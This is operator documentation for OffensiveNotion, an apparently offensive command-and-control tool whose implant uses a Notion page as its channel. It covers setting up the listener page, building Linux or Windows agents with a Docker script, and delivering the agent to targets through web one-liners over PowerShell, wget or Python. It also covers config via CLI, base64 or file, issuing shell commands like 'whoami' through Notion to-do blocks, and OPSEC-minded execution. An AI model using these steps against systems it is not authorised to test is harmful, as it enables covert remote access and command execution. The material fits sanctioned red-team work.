2. Quickstart
How do I get this thing working so I can see what it can do?
- Make a Notion account
- Make a Notion API developer account
- Create a page in your Notion book (any page will do). This is your "Listener." Copy the final part of the URL or press ctl+L in the Desktop app. This is your parent page ID. Keep track of it for a moment. Deck out your page with a banner and emoji icon. Have fun with it.
- In the upper-right corner of your Notion page, click "Share" and "Invite." Add your Notion Developer API account to this page.
- Download the Release agent.
- Run the release agent in debug mode (
-d) and input the values for each prompt.
husky@ubuntu:~/Desktop/OffensiveNotion/bin/linux_debug/debug$ ./offensive_notion -d
[*] Starting!
Getting config options!
[*] Enter agent sleep interval > 5
[*] Enter agent jitter time > 0
[*] Enter parent page id > [...your parent page ID..]
[*] Enter API Key >
[...your API key...]
[*] Enter Config File Path >
[leave blank]
[*] Enter Log Level (1-4) >
2
- Your agent should now check into your Listener page:
- Run commands! Make a To-Do block (
/todoin the Notion app), entershell whoami 🎯, and watch the magic unfold.
See the Agent Interaction section for the full list of available commands.
The Python script (main.py) is included as a quick and easy agent configuration/generation utility. It must be run with root privileges and has some dependencies.
The primary purpose of the Python script is to make it easy for the operator to set the agent's config parameters in the code of the agent itself so it can be run without arguments. The script automates all of the steps required to do so.
husky@ubuntu:~/Desktop/OffensiveNotion$ sudo python3 main.py -h
usage: main.py [-h] [-o {linux,windows}] [-b {debug,release}] [-c] [-w] [-m {powershell,wget-linux,wget-psh,python-linux,python-windows}] [-ip HOSTIP] [-p PORT]
OffensiveNotion Setup. Must be run as root. Generates the OffensiveNotion agent in a container.
optional arguments:
-h, --help show this help message and exit
-o {linux,windows}, --os {linux,windows}
Target OS
-b {debug,release}, --build {debug,release}
Binary build
-c, --c2lint C2 linter. Checks your C2 config by creating a test page on your Listener.
-w, --webdelivery Start a web delivery server to host and deliver your agent. Provides convenient one liners to run on the target.
-m {powershell,wget-linux,wget-psh,python-linux,python-windows}, --method {powershell,wget-linux,wget-psh,python-linux,python-windows}
Method of web delivery
-ip HOSTIP, --hostIP HOSTIP
Web server host IP.
-p PORT, --port PORT Web server host port.
The main.py script handles all setup and agent compilation. You need docker in order to use it.
If you don't have docker already:
$ sudo apt-get install docker.io
Next, install the Python dependencies:
$ pip3 install poetry
$ poetry shell
$ poetry install
Then run the main script:
$ sudo python3 main.py [-h] [-o {linux,windows}] [-b {debug,release}] [-c] [-w] [-m {powershell,wget-linux,wget-psh,python-linux,python-windows}] [-ip HOSTIP] [-p PORT]
The only two arguments that are required are -o, for the OS, and -b, for the build (debug or release). The additional arguments are covered in the Misc section.
Once the script is running, follow the prompts to perform the installation. It creates a Docker container and creates the agent inside, then copies it to your physical host and deletes the container.
The compiled agent can be run with a few different arguments. There is no help menu for the compiled agent, so please reference the following for its possible parameters:
If the agent has been compiled with default values for its parameters (i.e. with main.py), those values are used by the agent when running with no arguments. This is the most OPSEC safe way to execute the agent. See the Quickstart guide and main.py for more information.
If the agent has not been compiled with default values for parameters, it will attempt to locate cfg.json in the current working directory. If this file is present, it will run with those parameters.
If there is no cfg.json file available in this case, the agent will exit without establishing a connection.
Allows you to input each agent parameter via the CLI. Recommended for debugging and testing. Not recommended for operations.
Example:
$ ./offensive_notion -d
[*] Starting!
Getting config options!
[*] Enter agent sleep interval > 5
[*] Enter agent jitter time > 3
[*] Enter parent page id > [....parent page ID....]
[*] Enter API Key >
[...API key...]
[*] Enter Config File Path >
[*] Enter Log Level (1-4) >
5
[+] Admin context: false
[+] Hostname: ubuntu
[?] Config options: ConfigOptions { sleep_interval: 5, jitter_time: 3, parent_page_id: "[...parent page ID...]", api_key: "[...API key...]", config_file_path: "", launch_app: false, log_level: 5 }
[+] Creating page...
[+] zzzZZZzzz: 5 seconds
Allows a base64 encoded version of the configuration options to be passed at execution.
Example:
$ ./offensive_notion -b eyJzbGVlcF9pbnRlcnZhbCI6NSwiaml0dGVyX3RpbWUiOjMsInBhcmVudF9wYWdlX2lkIjoiWy4uLi4gcGFyZW50IHBhZ2UgSUQuLi5dIiwiYXBpX2tleSI6IlsuLi4uc2VjcmV0IGtleS4uLl0iLCJjb25maWdfZmlsZV9wYXRoIjoiY2ZnLmpzb24iLCJsYXVuY2hfYXBwIjpmYWxzZSwibG9nX2xldmVsIjo1fQ==
[*] Starting!
[+] Admin context: false
[+] Hostname: ubuntu
[?] Config options: ConfigOptions { sleep_interval: 5, jitter_time: 3, parent_page_id: "[...parent page ID...]", api_key: "[...API key...]", config_file_path: "", launch_app: false, log_level: 5 }
[+] Creating page...
[+] zzzZZZzzz: 5 seconds
Passes a config file path to the agent to pull configurations.
Example:
$ cat cfg.json
{"sleep_interval":5,"jitter_time":3,"parent_page_id":"[...parent page ID...]","api_key":"[...APi key...]","config_file_path":"cfg.json","launch_app":false,"log_level":5}
$ ./offensive_notion -c cfg.json
[*] Starting!
Object({"api_key": String("[....API key.....]"), "config_file_path": String("cfg.json"), "jitter_time": Number(3), "launch_app": Bool(false), "log_level": Number(5), "parent_page_id": String("[...parent page ID...]"), "sleep_interval": Number(5)})
[+] Admin context: false
[+] Hostname: ubuntu
[?] Config options: ConfigOptions { sleep_interval: 5, jitter_time: 3, parent_page_id: "[...parent page ID....]", api_key: "[...API key....]", config_file_path: "cfg.json", launch_app: false, log_level: 5 }
[+] Creating page...
[+] zzzZZZzzz: 5 seconds